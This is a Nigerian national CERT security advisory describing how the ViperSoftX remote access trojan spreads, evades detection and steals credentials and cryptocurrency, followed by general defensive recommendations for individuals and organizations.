Wednesday January 22, 2025

ngCERT SECURITY ADVISORY ON VIPERSOFTX MALWARE INFILTRATION

Advisory ID: ngCERT-2025-010004

Summary: 

ngCERT is issuing an urgent security alert regarding the infiltration of ViperSoftX malware within Nigerian cyberspace. ViperSoftX is a JavaScript-based Remote Access Trojan (RAT) capable of stealing sensitive information like banking and cryptocurrency details while evading detection and analysis on an infected system. Cybercriminals distribute this malware through infected email attachments, malicious online advertisements, social engineering, and cracked software. When successfully deployed on a system, the Trojan could be used for several malicious activities, leading to system compromise, data exfiltration, financial losses, identity theft, and ransomware attacks. ngCERT advises individuals and organizations to protect their systems and data from ViperSoftX malware immediately.

Damage/Probability: CRITICAL/HIGH

Platform(s): Operating Systems

Description: 

ViperSoftX malware infection begins when cybercriminals lure unsuspecting victims into downloading malicious files from multimedia sites, endpoints of cracked software, eBooks, torrent sites, and malicious emails. Upon execution, ViperSoftX initiates checks to avoid virtual environments and security monitoring, identification of antivirus tools to ascertain the risk of detection, and the running of a PowerShell script to download its core malicious components. Thereafter, the Trojan establishes two-way communication with its C2 servers to receive instructions and exfiltrates sensitive data. Summarily, the attack process involves infection and delivery stage, anti-analysis and security evasion procedures, PowerShell script execution, and rogue browser extension installation such as VenomSoftX, while carrying out cryptocurrency and password management targeting. These are aimed at stealing login credentials, cookies, and autofill data, allowing for a sweeping breach of user accounts and sensitive data. Also, through clipboard hijacking, ViperSoftX copies valid wallet addresses and replaces them with its own, thereby diverting any cryptocurrency transactions away from the victim. It further carries out password manager data extracting, which exposes the entire security framework of the victim’s system to further attacks.

Consequences: 

 Successful exploitation of the vulnerabilities could lead to:

  • System compromise

  • Unauthorized access to sensitive data.

  • Loss and theft of sensitive data.

  • Reputation Damage.

  • Ransomware attacks.

  • Financial loss.

Solution:  

 ngCERT recommends the following: 

  • Refrain from opening attachments in emails received unexpectedly from trustworthy users or unreliable sources.

  • Ensure that the assets/systems operating system, applications, antivirus, and plugins are up to date.

  • Conduct regular system scans and remove detected/potential threats.

  • Maintain regular data backups on external devices or reputable cloud storage providers.

  • Consider implementing stronger security measures, including firewalls, intrusion detection/prevention systems, anti-phishing solutions, endpoint detection and response solutions including anti-malware software.

  • Implement comprehensive security solutions to all necessary devices such as BitLocker, FileVault, and/or device encryption.

  • Enforce a strong password policy and implement regular password changes.c

  • Disable unused services and open ports on your agency's servers and endpoint devices. Only open ports and activate services that are necessary for daily operations.

References: